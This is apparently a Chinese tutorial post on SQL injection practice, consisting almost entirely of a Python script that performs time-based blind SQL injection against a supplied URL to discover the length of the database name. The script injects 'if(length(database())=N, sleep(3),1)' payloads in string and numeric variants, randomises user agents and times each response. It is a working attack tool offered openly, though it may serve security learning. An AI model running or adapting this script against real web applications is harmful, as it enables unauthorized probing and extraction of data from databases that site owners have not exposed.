SQL注入代码实践（盲注-获取数据库名长度【数值型】）

# -*- coding: utf-8 -*-
"""
@Time ： 2022/4/4 16:19
@Auth ： zhangxiang
@File ：GetLength_Inject.py
@IDE ：PyCharm
@Motto：ABC(Always Be Coding)

"""
#获取数据库名长度
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list

class GetLength_Inject(object):
    def __init__(self):
        pass
    def Str_Start(self,StrList,url):
        for num in range(1,32):

            judgeStr = "%20and%20if((length((select%20database()))=changeNum),sleep(3),1)%23"
            submitStr = "&submit=0x5375626D6974%23"
            pattern1 = r"changeNum"
            replace1 = str(num)
            FisWord = re.sub(pattern1,replace1,judgeStr)
            full_url = url + FisWord + submitStr
            print(full_url)
            headers = {'User-Agent':random.choice(ua_list)}
            startTime = time.time()
            req = request.Request(url=full_url,headers=headers)
            res = request.urlopen(req)
            endTime = time.time()
            allTime = endTime - startTime
            # print(allTime)

            if(allTime>3):
                print("*"*200)
                #StrList.append(num)
                print("得到盲注结果,数据库的长度为:"+str(num))
                print("注入的payload："+full_url)
                print("使用的时间："+str(allTime))
                print("*"*200)
                # print(StrList)
                # if (StrList[num] == None):
                #     return 0
                return  num
            else:
                pass
    def Num_Start(self,StrList,url):
        for num in range(1,32):

            judgeStr = "%20and%20if((length((select%20database()))=changeNum),sleep(3),1)"
            submitStr = "&submit=0x5375626D6974"
            pattern1 = r"changeNum"
            replace1 = str(num)
            FisWord = re.sub(pattern1,replace1,judgeStr)
            full_url = url + FisWord + submitStr
            # print(full_url)
            headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0'}
            startTime = time.time()
            req = request.Request(url=full_url,headers=headers)
            res = request.urlopen(req)
            endTime = time.time()
            allTime = endTime - startTime
            # print(allTime)

            if(allTime>3):
                print("*"*200)
                # StrList.append(num)
                print("得到盲注结果,数据库的长度为:"+str(num))
                print("注入的payload："+full_url)
                print("使用的时间："+str(allTime))
                print("*"*200)
                # print(StrList)
                # if (StrList[num] == None):
                #     return 0
                return num
            else:
                pass